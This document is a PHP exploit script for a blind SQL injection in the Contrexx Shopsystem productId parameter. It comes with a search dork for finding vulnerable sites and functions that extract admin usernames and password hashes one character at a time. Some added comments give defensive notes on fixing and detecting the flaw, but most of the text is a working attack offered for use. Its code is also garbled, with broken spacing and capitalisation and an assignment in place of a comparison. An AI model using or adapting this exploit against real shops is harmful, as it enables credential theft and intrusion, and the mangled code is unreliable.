Exploit title: Contrexx Shopsystem Blind SQL Injection Exploit
Exploit PoC: index. php? Section = shop & productId = [VALID productid] and [your blind SQL CODE]
Exploit tested on: Debian 6, Ubuntu Linux 11.04
Exploit found and written by: Penguin
Version: <= 2.2 SP3
Date found: 12.8.11
Dork: inurl: index. php? Section = shop & productId =
Vendor: www.contrexx.com
Visit: www.null-sector.info
Contact: Jabber-> penguin@null-sector.info
#! /Usr/bin/php
<? Php
/*
Exploit title: Contrexx Shopsystem Blind SQL Injection Exploit
Exploit PoC: index. php? Section = shop & productId = [VALID productid] and [your blind SQL CODE]
Exploit tested on: Debian 6, Ubuntu Linux 11.04
Exploit found and written by: Penguin
Version: <= 2.2 SP3
Date found: 12.8.11
Dork: inurl: index. php? Section = shop & productId =
Web: www.2cto.com
Visit: www.null-sector.info
Contact: Jabber-> penguin@null-sector.info
Greets to: Blacktiger/Luxy, Leto, hAgBaRd2ooo, KrimiX, zYiix, reutz/head
Important info to this Exploit:
If you want to use it on a non-german site you have to edit the string in testIt "In den Warenkorb "!
Known Bugs:
-> Some servers respond with a 500 Internal Server Error. Dunno why :(
-> On non-german shops you must edit the function testIt. It does not fetch a keyword automatically :/
*/
// Console banner.  Defender context: this PoC exercises a boolean-based blind
// SQL injection in the shop's productId parameter (see the header comment);
// the application-side fix is to cast or bind productId as an integer before
// it reaches any query.
Echo "###################################### # \ r \ n ";
Echo "# Contrexx Shopsystem Exploit # \ r \ n ";
Echo "# Exploit Type: Blind SQL Injection # \ r \ n ";
Echo "# Exploit State: Non-Public # \ r \ n ";
Echo "# Programmed by: Penguin # \ r \ n ";
Echo "###################################### # \ r \ n ";
// Three positional arguments are required (argc also counts the script name).
If ($ argc <4)
{
Echo "USAGE:./exploit. php [TARGET] [PRODUCTID] [admin row] \ r \ n ";
Echo "Target = ex. http://www.bkjia.com/index. php \ r \ n ";
Echo "PRODUCTID = a VALID ProductId! \ R \ n ";
Echo "Admin Row = The Exploit selects all admins and use limit [admin row], 1. Standard: 0 \ r \ n ";
} Else {
// There are some Config variables :)
// If you know what you're doing, feel free to change them:>
// Base URL: the product id from argv[2] is appended verbatim, and every probe
// issued by the functions below extends this same query string.
$ Target_url = $ argv [1]. "? Section = shop & cmd = details & productId = ". $ argv [2];
// Decimal ASCII range tried for each username position (start inclusive,
// end exclusive -- see the inner loop bound in getUsername).
$ Charset_start_usr = 96;
$ Charset_end_usr = 126;
// Candidate ASCII codes tried for each hash position.
$ Charset_hash = Array (99,100,101,102 );
// Upper bound for the username-length search in getUsername; getHash does
// not use it.
$ ToLength = 100;
// LIMIT offset: which admin row (0-based) is read.
$ MyLimit = $ argv [3];
// Now the Action start :)
Echo "Starting exploit... \ r \ nChecking if Vulnerable ...";
// Vulnerability probe: a trailing single quote is appended and the response
// is checked with testIt() for the shop's add-to-cart marker.
$ Check = file_get_contents ($ target_url ."'");
If (testIt ($ check) = true)
{
Die ("Target is not Vulnerable :( \ r \ n ");
}
Echo "Target is Vulnerable :) \ r \ n ";
Echo "Starting the SQL Injection... \ r \ n ";
Echo "Fetching Username... \ r \ n ";
// Detection note: a full run issues on the order of a few hundred GET
// requests to the same product page, each carrying "/**/and/**/" plus
// select/substring text in productId -- a distinctive log/WAF signature.
$ Username = getUsername ($ toLength, $ charset_start_usr, $ charset_end_usr, $ target_url, $ myLimit );
$ Hash = getHash ($ toLength, $ charset_hash, $ target_url, $ myLimit );
Echo "Exploited Successfully! \ R \ n ";
Echo "Full Logindata: $ username: $ hash \ r \ n ";
Echo "Have fun;) \ r \ n ";
}
/////////////////////////////////////////
// Functions-Sorry, code is a bit "uugly ":)
// getUsername: boolean-blind recovery of one admin username, one byte at a time.
//   $toLength      upper bound (exclusive) for the length search
//   $charset_start first ASCII code tried per position (inclusive)
//   $charset_end   last ASCII code tried per position (exclusive)
//   $target_url    base URL carrying the productId parameter
//   $limit         0-based row offset used in the LIMIT clause
// Returns the assembled username; calls Die() if no length probe matched.
// Every probe is decided by testIt(): whether the shop's add-to-cart marker
// is still rendered is the entire side channel.  Defender note: casting or
// binding productId as an integer removes the injection point; serving an
// identical page for any invalid id would only hide the flaw, not fix it.
Function getUsername ($ toLength, $ charset_start, $ charset_end, $ target_url, $ limit)
{
$ Username = "";
// Get Length
$ Length =-1;
// Phase 1: probe length(username) = $i for each i in [0, toLength).
For ($ I = 0; $ I <$ toLength; $ I ++)
{
$ Url = $ target_url. "/**/and/**/(select/**/length (username) /**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$ limit, 1) = ". $ I;
$ Src = file_get_contents ($ url );
If (testIt ($ src) = true)
{
$ Length = $ I;
Break;
}
}
If ($ length =-1)
{
Die ("There was a problem @ fetching username length :( \ r \ n ");
}
Echo "Username length: $ length! \ R \ n ";
$ Username = "";
Echo "Username :";
// Phase 2: for each 1-based position $p, try every candidate code $c until
// testIt() accepts substring(username, $p, 1) = char($c).
For ($ k = 0; $ k <$ length; $ k ++)
{
$ CharToAdd = "";
For ($ c = $ charset_start; $ c <$ charset_end; $ c ++)
{
$ P = $ k + 1;
$ Src = file_get_contents ($ target_url. "/**/and/**/substring (select/**/username/**/from/**/contrexx_access_users/**/where/**/is_admin/ **/=/**/1/**/limit/**/$ limit, 1), $ p, 1) = char ($ c )");
If (testIt ($ src) = true)
{
$ CharToAdd = $ c;
Break;
}
}
Echo chr ($ c );
$ Username. = chr ($ c );
}
Echo "\ r \ n ";
Return $ username;
}
// getHash: boolean-blind recovery of the selected admin's password hash.
//   $toLength    accepted for symmetry with getUsername but not used here;
//                the position loop is hard-coded to 32 iterations
//   $charset     array of candidate ASCII codes tried at each position
//   $target_url  base URL carrying the productId parameter
//   $limit       0-based row offset used in the LIMIT clause
// Returns the assembled hash string.  Defender note: the hash is readable
// because of the same injection; storing credentials with a slow, salted
// scheme limits the value of such a leak (the scheme in use is not visible
// from this script -- confirm against the application).
Function getHash ($ toLength, $ charset, $ target_url, $ limit)
{
// Get Hash
$ Hash = "";
Echo "Hash :";
// For each 1-based position $p, try every code in $charset until testIt()
// accepts substring(password, $p, 1) = char($z).
For ($ k = 0; $ k <32; $ k ++)
{
$ CharToAdd = "";
For ($ c = 0; $ c <count ($ charset); $ c ++)
{
$ P = $ k + 1;
$ Z = $ charset [$ c];
$ Src = file_get_contents ($ target_url. "/**/and/**/substring (select/**/password/**/from/**/contrexx_access_users/**/where/**/is_admin/ **/=/**/1/**/limit/**/$ limit, 1), $ p, 1) = char ($ z )");
If (testIt ($ src) = true)
{
$ CharToAdd = $ charset [$ c];
Break;
}
}
Echo chr ($ charToAdd );
$ Hash. = chr ($ charToAdd );
}
Echo "\ r \ n ";
Return $ hash;
}
// testIt: the oracle for every blind probe.  Returns true when the fetched
// page contains the German add-to-cart label "In den Warenkorb" at least
// once (explode() then yields two or more pieces), false otherwise.  The
// header comment notes the marker is locale-specific.  Defender note: the
// observable difference in page content is what makes the injection
// exploitable blind; the fix still belongs at the query (integer cast/bind).
Function testIt ($ src)
{
$ Check = explode ("In den Warenkorb", $ src );
If (count ($ check)> = 2)
{
Return true;
}
Return false;
}
?>